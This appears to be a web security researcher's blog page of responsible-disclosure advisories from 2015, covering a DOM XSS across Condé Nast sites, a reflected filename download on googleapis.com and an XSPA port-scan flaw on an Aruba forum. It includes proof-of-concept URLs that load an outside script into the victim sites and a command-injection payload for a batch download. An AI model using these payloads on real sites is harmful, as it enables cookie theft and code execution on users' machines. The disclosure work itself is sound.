David Sopas – Web Security Researcher

Advisories

16/09/15 Advisories # , , ,

DOM XSS in all Condé Nast sites network

DOM XSS in all Condé Nast sites network

For those who don’t know Condé Nast:

Condé Nast, a division of Advance Publications, is a mass media company headquartered at One World Trade Center in New York City. The company attracts more than 164 million consumers across its 20 print and digital media brands: Allure, Architectural Digest, Ars Technica, Bon Appétit, Brides, Condé Nast Traveler, Details, Epicurious, Glamour, Golf Digest, Golf World, GQ, Lucky, The New Yorker, Self, Teen Vogue, Vanity Fair, Vogue, W and Wired.

A DOM XSS vulnerability present in specific ads page on newyorker.com allowed me to understand that all of their network websites were vulnerable if a user to injected code into the url.

The affected file was displayad.html on ads directory:

<script type="text/javascript">
document.write('<script type="text/javascript" src="' + (location.search.split('req=')[1] || '') + '"></scr'+'ipt>');
</script>

location.search.split function is not properly escaped so it was possible to manipulate “req” parameter as we wish.

Proof-of-Concept:

http://www.newyorker.com/ads/displayad.html?req=https://www.davidsopas.com/poc/xss.js

Other sites on the network:

http://www.bonappetit.com/ads/displayad.html?req=https://www.davidsopas.com/poc/xss.js
http://www.brides.com/ads/displayad.html?req=https://www.davidsopas.com/poc/xss.js
http://www.wired.com/ads/displayad.html?req=https://www.davidsopas.com/poc/xss.js
http://www.arstechnica.com/ads/displayad.html?req=https://www.davidsopas.com/poc/xss.js
http://www.newyorker.com/ads/displayad.html?req=https://www.davidsopas.com/poc/xss.js
http://www.style.com/ads/displayad.html?req=https://www.davidsopas.com/poc/xss.js
http://www.vanityfair.com/ads/displayad.html?req=https://www.davidsopas.com/poc/xss.js
http://www.architecturaldigest.com/ads/displayad.html?req=https://www.davidsopas.com/poc/xss.js
http://www.gq.com/ads/displayad.html?req=https://www.davidsopas.com/poc/xss.js
http://www.gourmet.com/ads/displayad.html?req=https://www.davidsopas.com/poc/xss.js
http://www.glamour.com/ads/displayad.html?req=https://www.davidsopas.com/poc/xss.js

Keep in mind that these sites brings millions of users every day and these vulnerability in the wrong hands would be very dangerous.
A malicious user could also:

  • Access other sites inside another client’s private intranet.
  • Steal another client’s cookie(s).
  • Modify another client’s cookie(s).
  • Steal another client’s submitted form data.
  • Modify another client’s submitted form data (before it reaches the server).
  • Submit a form to your application on the user’s behalf which modifies passwords or other application data

This was fixed by Condé Nast security team which kept me updated every time showing me that it’s a company that care about security and their clients. Hope they can keep up the good work.

Timeline:
08-09-2015 Asked for a security contact
09-09-2015 First contact with the head of security of Condé Nast
10-09-2015 Sent the report
11-09-2015 Update received that they were clearing cache
14-09-2015 Problem solved
16-09-2015 Full disclosure

no responses
10/09/15 Advisories # , ,

Google Reflected Filename Download

Google Reflected Filename Download

I found a critical issue on Google that can be used by malicious users to hijack victims computer using Google domain as platform and trust source.

I come across this security issue because I detected a JSON request using Google Inspector made by the following URL:

https://www.googleapis.com/customsearch/v1?callback=jQuery17109823856276925653_1439708781699&key=AIzaSyCMGfdDaSfjqv5zYoS0mTJnOT3e9MURWkU&cx=014141993897103097974%3A46gdqg1e99k&q=xss&num=5&_=1439709781835

After checking that callback variable could be reflected on the screen I tried the following GET request:

https://www.googleapis.com/customsearch/v1?callback=calc&key=&cx=&q=xss&num=5

Which returns the following JSON information:

// API callback
calc({
"error": {
"errors": [
{
"domain": "usageLimits",
"reason": "keyInvalid",
"message": "Bad Request"
}
],
"code": 400,
"message": "Bad Request"
}
}
);

It returns HTTP status code 200 even when the JSON request tells that’s an error (?). In this case callback only allows a command to be executed without spaces so in the following proof-of-concept I could execute calc from Windows.

But I wanted a better and more exploitable proof-of-concept so I tried with the query parameter – “q”:

https://www.googleapis.com/customsearch/v1?callback=jQuery17109823856276925653_1439708781699&key=AIzaSyCMGfdDaSfjqv5zYoS0mTJnOT3e9MURWkU&cx=014141993897103097974%3A46gdqg1e99k&q=%22%7C%7Cstart+chrome+davidsopas.com%2Fpoc%2Fmalware.htm%7C%7C&num=5

Which returned:

"title": "Google Custom Search - \"||start chrome davidsopas.com/poc/malware.htm||",
"searchTerms": "\"||start chrome davidsopas.com/poc/malware.htm||",

The attack is reflected. Due to the fact that I couldn’t control the filename and force a download I needed to use HTML5 vector supported by the following browsers:

  • Chrome
  • Opera
  • Android Browser
  • Chrome for Android
  • Firefox

Online proof-of-concept  (downloads batch file that a new Chrome window with a URL – in my PoC is just text):

google_rfd3

google_rfd2

This works mostly on all Microsoft Windows versions. It also can be used in Linux and OSX but it needs more user interaction. For multi-plataform a malicious user could create a .htm file instead of a .bat file being the HTML file malicious. This is might be an alternative attack method to work with all operating systems.

So in my proof-of-concept I was able to execute a new window on Chrome browser with a page that simulates malware [it’s just text].

A malicious user could:

  1. Launch a malicious campaign with the specially crafted page providing Google offers – similar to my proof-of-concept
  2. Victim downloads the file thinking that is from a trusted domain [googleapis.com]
  3. Malicious user gains control over victims machine

How to fix this issue?
Google already fixed most of these issues by using HTTP header Content-disposition:attachment; filename=”f.txt” that will force the download to f.txt every time. But this time they decided not to fix it because they say that needs to many user interaction.

no responses
08/08/15 Advisories # , , ,

ArubaNetworks Avatar Image XSPA

ArubaNetworks Avatar Image XSPA

I found out that was possible to run a XSPA [Cross Site Port Attacks] using Avatar URL option on any registered community profile.
XSPA allows attackers to abuse available functionality in most web applications to port scan intranet and external Internet facing servers.
An application is vulnerable to Cross Site Port Attacks if the application processes user supplied URLs and does not verify/sanitize the backend response received from the server.

Proof-of-concept:
In this type of attack I always use Nmap testing machine – scanme.nmap.org to check what ports are open on the server.
Using Nmap on my operating system I tested 3 ports on scanme.nmap.org:

80/tcp open http
81/tcp closed http
443/tcp closed https

I now entered the following external URL on my Avatar web option – https://community.arubanetworks.com/t5/user/myprofilepage/tab/user-icons%3Aexternal:
http://scanme.nmap.org:80/

No server error.

I modified it to:
http://scanme.nmap.org:81/

And after to:
http://scanme.nmap.org:443/

The following errors were returned on the server:

http://scanme.nmap.org:81 – GET http://scanme.nmap.org:81/ net::ERR_CONNECTION_REFUSED

http://scanme.nmap.org:443 – GET http://scanme.nmap.org:443/ net::ERR_CONNECTION_REFUSED

You can even check that the port is stored in the avatar HTML:

<img id="display" class="lia-user-avatar-message" title="dsopas" src="http://scanme.nmap.org:443/" alt="dsopas" />

 

Aruba security team already fixed this issue so I decided to share with you guys.

no responses
03/08/15 Advisories # , ,

Desk.com Reflected Filename Download

Desk.com Reflected Filename Download

Who is Desk.com?

Salesforce Desk.com help desk software offers small businesses an all-in-one customer service software solution that will help keep customers happy and loyal. Desk.com can be set up in just hours, and provides multi-channel support, including phone, email, self-help pages, and social media. Not only will this innovative help desk software let your agents more easily serve customers, your small business will have the insights needed to build better products and make smarter, growth-driving decisions.

– in http://www.salesforce.com/desk/overview/

Who uses Desk.com?

Continue reading

no responses
1 2 3